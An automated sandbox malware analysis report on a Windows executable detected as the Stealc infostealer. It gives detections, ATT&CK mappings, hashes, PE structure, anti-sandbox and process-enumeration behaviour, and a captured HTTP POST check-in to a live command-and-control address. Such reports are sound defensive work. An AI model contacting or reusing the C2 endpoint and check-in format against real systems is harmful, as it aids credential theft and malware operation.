              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00424610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00424610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004246A0
              Source: file.exe, file.exe, 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: XProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00422D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00422B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00422B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00422A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00422A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00422C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00422C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1480967160.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1480967160.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php/r100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/3100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/=100%Avira URL Cloudmalware
              http://185.215.113.206/ctionSettingsLMEM80100%Avira URL Cloudmalware
              http://185.215.113.206/tVersion100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpM100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php.j100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.php/=file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/ctionSettingsLMEM80file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/nfile.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php.jfile.exe, 00000000.00000002.1522326773.0000000000FE3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/c4becf79229cb002.phpMfile.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206file.exe, 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/tVersionfile.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://185.215.113.206/c4becf79229cb002.php/3file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://185.215.113.206/c4becf79229cb002.php/rfile.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.206
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1558871
                        Start date and time:2024-11-19 22:11:07 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 15s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 121
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.206file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Cryptbot, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.43
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.43
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.944188978912843
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'792'512 bytes
                        MD5:b3cec29dfcc248bc4f4f33ff5ba14470
                        SHA1:389dc1f719b34841eaa55c8e81ce0f773fea3acf
                        SHA256:841e3ab686e632551e2229d68366490832987ab47d308c54f6817f3e13a5ff52
                        SHA512:85803678ee823025990a8377b0b51335be58365bc1fcabff37e4ed1330b93438bbbb94e40908f3ccaea4631ba5d155d0391198ee3639630bd981cfedfdc5828a
                        SSDEEP:49152:eZVwZPBu0P7eKyJFw0RfC4xtyZZ3z5Xz+lQQCf2cj9:eV+PBbLdCbDY3t2HG
                        TLSH:E1853326D435C69FDE7A6BBCD8B381D05A103F88A172927A7E1056943C11F4FBB788C9
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xa8c000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007FE4C171817Ah

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x2490000x16200de612d100bc29461b0d3bdc2484f9ee1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x24a0000x1ac0x200775146942c9f332f93cdd84f3f434ef5False0.58203125data4.564552801879117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x24c0000x2a30000x2002532f60218c7803dfe606fde863ed982unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        tcmgcthi0x4ef0000x19c0000x19bc00b0a364ce8d2551200f870dd7ce73397dFalse0.9945983701426837data7.953211456114112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        suhmtczi0x68b0000x10000x400831deaf4d5f23bcb886ea03a53bf4f95False0.7109375data5.740246842116669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x68c0000x30000x220051d1105411ed3606ea60fbd526e7419dFalse0.05330882352941176DOS executable (COM)0.6331999739279093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x68a9740x152ASCII text, with CRLF line terminators0.6479289940828402

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-19T22:12:15.255016+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.849706185.215.113.20680TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 19, 2024 22:12:14.622323036 CET4970680192.168.2.8185.215.113.206
                        Nov 19, 2024 22:12:14.829691887 CET8049706185.215.113.206192.168.2.8
                        Nov 19, 2024 22:12:14.829802990 CET4970680192.168.2.8185.215.113.206
                        Nov 19, 2024 22:12:14.830023050 CET4970680192.168.2.8185.215.113.206
                        Nov 19, 2024 22:12:15.036994934 CET8049706185.215.113.206192.168.2.8
                        Nov 19, 2024 22:12:15.037373066 CET8049706185.215.113.206192.168.2.8
                        Nov 19, 2024 22:12:15.037549973 CET4970680192.168.2.8185.215.113.206
                        Nov 19, 2024 22:12:15.040127039 CET4970680192.168.2.8185.215.113.206
                        Nov 19, 2024 22:12:15.247406006 CET8049706185.215.113.206192.168.2.8
                        Nov 19, 2024 22:12:15.251893044 CET8049706185.215.113.206192.168.2.8
                        Nov 19, 2024 22:12:15.255016088 CET4970680192.168.2.8185.215.113.206
                        Nov 19, 2024 22:12:18.155510902 CET4970680192.168.2.8185.215.113.206

                        HTTP Request Dependency Graph

                        • 185.215.113.206

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.849706185.215.113.206806524C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Nov 19, 2024 22:12:14.830023050 CET90OUTGET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 19, 2024 22:12:15.037373066 CET203INHTTP/1.1 200 OK
                        Date: Tue, 19 Nov 2024 21:12:14 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 19, 2024 22:12:15.040127039 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 44 38 46 46 32 44 30 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a
                        Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="hwid"5A8D8FF2D0153256450765------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build"mars------IIEHJKJJJECFHJJJKKEC--
                        Nov 19, 2024 22:12:15.251893044 CET210INHTTP/1.1 200 OK
                        Date: Tue, 19 Nov 2024 21:12:15 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:16:12:10
                        Start date:19/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x400000
                        File size:1'792'512 bytes
                        MD5 hash:B3CEC29DFCC248BC4F4F33FF5BA14470
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1480967160.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:4.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.3%
                          Total number of Nodes:1406
                          Total number of Limit Nodes:28
                          execution_graph 27265 423cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27307 4233c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27292 418615 49 API calls 27254 41e049 147 API calls 27308 418615 48 API calls 27255 422853 lstrcpy 27266 422cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27278 413959 244 API calls 27282 4101d9 126 API calls 27293 42732f lstrcpy lstrcat 27279 422d60 11 API calls 27294 422b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27295 42a280 __CxxFrameHandler 27285 411269 408 API calls 27256 405869 57 API calls 25817 421bf0 25869 402a90 25817->25869 25821 421c03 25822 421c29 lstrcpy 25821->25822 25823 421c35 25821->25823 25822->25823 25824 421c65 ExitProcess 25823->25824 25825 421c6d GetSystemInfo 25823->25825 25826 421c85 25825->25826 25827 421c7d ExitProcess 25825->25827 25970 401030 GetCurrentProcess VirtualAllocExNuma 25826->25970 25832 421ca2 25833 421cb8 25832->25833 25834 421cb0 ExitProcess 25832->25834 25982 422ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25833->25982 25836 421ce7 lstrlen 25841 421cff 25836->25841 25837 421cbd 25837->25836 26191 422a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25837->26191 25839 421cd1 25839->25836 25843 421ce0 ExitProcess 25839->25843 25840 421d23 lstrlen 25842 421d39 25840->25842 25841->25840 25844 421d13 lstrcpy lstrcat 25841->25844 25845 421d5a 25842->25845 25847 421d46 lstrcpy lstrcat 25842->25847 25844->25840 25846 422ad0 3 API calls 25845->25846 25848 421d5f lstrlen 25846->25848 25847->25845 25850 421d74 25848->25850 25849 421d9a lstrlen 25851 421db0 25849->25851 25850->25849 25852 421d87 lstrcpy lstrcat 25850->25852 25853 421dce 25851->25853 25854 421dba lstrcpy lstrcat 25851->25854 25852->25849 25984 422a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25853->25984 25854->25853 25856 421dd3 lstrlen 25857 421de7 25856->25857 25858 421df7 lstrcpy lstrcat 25857->25858 25859 421e0a 25857->25859 25858->25859 25860 421e28 lstrcpy 25859->25860 25861 421e30 25859->25861 25860->25861 25862 421e56 OpenEventA 25861->25862 25863 421e68 CloseHandle Sleep OpenEventA 25862->25863 25864 421e8c CreateEventA 25862->25864 25863->25863 25863->25864 25985 421b20 GetSystemTime 25864->25985 25868 421ea5 CloseHandle ExitProcess 26192 404a60 25869->26192 25871 402aa1 25872 404a60 2 API calls 25871->25872 25873 402ab7 25872->25873 25874 404a60 2 API calls 25873->25874 25875 402acd 25874->25875 25876 404a60 2 API calls 25875->25876 25877 402ae3 25876->25877 25878 404a60 2 API calls 25877->25878 25879 402af9 25878->25879 25880 404a60 2 API calls 25879->25880 25881 402b0f 25880->25881 25882 404a60 2 API calls 25881->25882 25883 402b28 25882->25883 25884 404a60 2 API calls 25883->25884 25885 402b3e 25884->25885 25886 404a60 2 API calls 25885->25886 25887 402b54 25886->25887 25888 404a60 2 API calls 25887->25888 25889 402b6a 25888->25889 25890 404a60 2 API calls 25889->25890 25891 402b80 25890->25891 25892 404a60 2 API calls 25891->25892 25893 402b96 25892->25893 25894 404a60 2 API calls 25893->25894 25895 402baf 25894->25895 25896 404a60 2 API calls 25895->25896 25897 402bc5 25896->25897 25898 404a60 2 API calls 25897->25898 25899 402bdb 25898->25899 25900 404a60 2 API calls 25899->25900 25901 402bf1 25900->25901 25902 404a60 2 API calls 25901->25902 25903 402c07 25902->25903 25904 404a60 2 API calls 25903->25904 25905 402c1d 25904->25905 25906 404a60 2 API calls 25905->25906 25907 402c36 25906->25907 25908 404a60 2 API calls 25907->25908 25909 402c4c 25908->25909 25910 404a60 2 API calls 25909->25910 25911 402c62 25910->25911 25912 404a60 2 API calls 25911->25912 25913 402c78 25912->25913 25914 404a60 2 API calls 25913->25914 25915 402c8e 25914->25915 25916 404a60 2 API calls 25915->25916 25917 402ca4 25916->25917 25918 404a60 2 API calls 25917->25918 25919 402cbd 25918->25919 25920 404a60 2 API calls 25919->25920 25921 402cd3 25920->25921 25922 404a60 2 API calls 25921->25922 25923 402ce9 25922->25923 25924 404a60 2 API calls 25923->25924 25925 402cff 25924->25925 25926 404a60 2 API calls 25925->25926 25927 402d15 25926->25927 25928 404a60 2 API calls 25927->25928 25929 402d2b 25928->25929 25930 404a60 2 API calls 25929->25930 25931 402d44 25930->25931 25932 404a60 2 API calls 25931->25932 25933 402d5a 25932->25933 25934 404a60 2 API calls 25933->25934 25935 402d70 25934->25935 25936 404a60 2 API calls 25935->25936 25937 402d86 25936->25937 25938 404a60 2 API calls 25937->25938 25939 402d9c 25938->25939 25940 404a60 2 API calls 25939->25940 25941 402db2 25940->25941 25942 404a60 2 API calls 25941->25942 25943 402dcb 25942->25943 25944 404a60 2 API calls 25943->25944 25945 402de1 25944->25945 25946 404a60 2 API calls 25945->25946 25947 402df7 25946->25947 25948 404a60 2 API calls 25947->25948 25949 402e0d 25948->25949 25950 404a60 2 API calls 25949->25950 25951 402e23 25950->25951 25952 404a60 2 API calls 25951->25952 25953 402e39 25952->25953 25954 404a60 2 API calls 25953->25954 25955 402e52 25954->25955 25956 426390 GetPEB 25955->25956 25957 4265c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25956->25957 25962 4263c3 25956->25962 25958 426625 GetProcAddress 25957->25958 25959 426638 25957->25959 25958->25959 25960 426641 GetProcAddress GetProcAddress 25959->25960 25961 42666c 25959->25961 25960->25961 25963 426675 GetProcAddress 25961->25963 25964 426688 25961->25964 25965 4263d7 20 API calls 25962->25965 25963->25964 25966 426691 GetProcAddress 25964->25966 25967 4266a4 25964->25967 25965->25957 25966->25967 25968 4266d7 25967->25968 25969 4266ad GetProcAddress GetProcAddress 25967->25969 25968->25821 25969->25968 25971 401057 ExitProcess 25970->25971 25972 40105e VirtualAlloc 25970->25972 25973 40107d 25972->25973 25974 4010b1 25973->25974 25975 40108a VirtualFree 25973->25975 25976 4010c0 25974->25976 25975->25974 25977 4010d0 GlobalMemoryStatusEx 25976->25977 25979 401112 ExitProcess 25977->25979 25980 4010f5 25977->25980 25980->25979 25981 40111a GetUserDefaultLangID 25980->25981 25981->25832 25981->25833 25983 422b24 25982->25983 25983->25837 25984->25856 26197 421820 25985->26197 25987 421b81 sscanf 26236 